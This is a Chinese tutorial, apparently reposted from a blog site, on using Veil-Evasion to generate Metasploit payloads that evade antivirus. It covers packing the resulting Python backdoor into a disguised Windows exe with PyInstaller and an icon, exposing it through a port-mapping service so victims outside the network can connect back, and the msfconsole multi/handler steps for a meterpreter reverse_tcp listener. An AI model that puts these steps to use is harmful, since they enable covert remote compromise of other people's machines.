Veil Evasion是一个可执行文件,它被用来生成Metasploit的payload,能绕过常见杀软。
Veil-Evasion被原生设计为在kali上,但其实存在python环境的系统上应该都能运行。你可以用命令行轻松调用Veil-Evasion,按菜单选项生成payload。在创建payload的时候,Veil-Evasion会询问你是否想把payload文件用Pyinstaller或者Py2Exe转为可执行文件。
1、安装
veil-evasion,kalilinux可以直接 apt-get install veil-evasion,或者直接到官 下载:https://github.com/Veil-Framework/Veil
2、使用
生成成功后会显示如下内容:
可以到/var/lib/veil-evasion/output/source/这个文件夹下找到生成的python后门脚本。
这个过程实际上是生成了一个python脚本,我们可以通过pyinstaller将其转化问exe文件
下面简单讲一下将python脚本生成为exe文件的过程
pyinstaller安装:
1,下载pyinstaller并解压(可以去官 下载最新版):
http://nchc.dl.sourceforge.net/project/pyinstaller/2.0/pyinstaller-2.0.zip
2,安装最新版本的 pywin32-217.win32-py2.7.exe:
http://download.csdn.net/detail/gfsfg8545/6539111
不然会出现错误Error: PyInstaller for Python 2.6+ on Windows needs pywin32.
具体安装过程可以参考这篇博文:
http://blog.csdn.net/hmy1106/article/details/45151409
一般的命令:(cmd进入到pyinstaller的文件夹)
python pyinstaller.py -w –onefile xxx.py(你想转换的py脚本)
python pyinstaller.py -w –onefile –icon=”my.ico” xxx.py
关于图标的设置问题:应该准备四张不同尺寸(具体尺寸参见http://stackoverflow.com/questions/3236115/which-icon-sizes-should-my-windows-applications-icon-include)的png文件,然后用png2icon(下载)脚本把它们合成一张icon图标文件
2、外 链接后门
这个就需要进行端口映射,我这里使用了花生壳作为外 端口映射的工具,花生壳的具体操作过程不再赘述。
veil-evasion生成payload的时候,LHOST要设置成你在花生壳上申请的域名(也可以设置从域名指向的ip),LPORT要设置成花生壳分配的那个端口
花生壳设置的时候,外 域名指向你本机内 的ip地址,和你自己设定的映射端口 。
msf监听:
1、开启msf
2、use exploit/multi/handler
3、set PAYLOAD windows/meterpreter/reverse_tcp
4、- set LHOST 你本机内 的ip地 ,set LPORT 你本地监听的端口
5、explit
文章知识点与官方知识档案匹配,可进一步学习相关知识Python入门技能树首页概览214859 人正在系统学习中
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!